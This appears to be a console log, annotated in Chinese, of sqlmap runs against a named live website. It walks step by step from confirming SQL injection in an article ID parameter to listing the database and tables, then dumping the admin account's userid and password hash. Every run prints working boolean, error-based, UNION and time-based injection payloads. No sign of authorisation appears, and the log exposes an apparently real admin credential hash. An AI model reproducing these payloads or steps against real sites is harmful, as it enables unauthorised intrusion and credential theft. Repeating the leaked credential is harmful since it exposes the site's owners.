D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* 注解:获取当前用户名称
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
starting at: 16:53:54
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /*当前数据库
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
starting at: 16:54:16
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
starting at: 16:55:25
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+
shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+
shutting down at: 16:58:14

D:\Python27\sqlmap>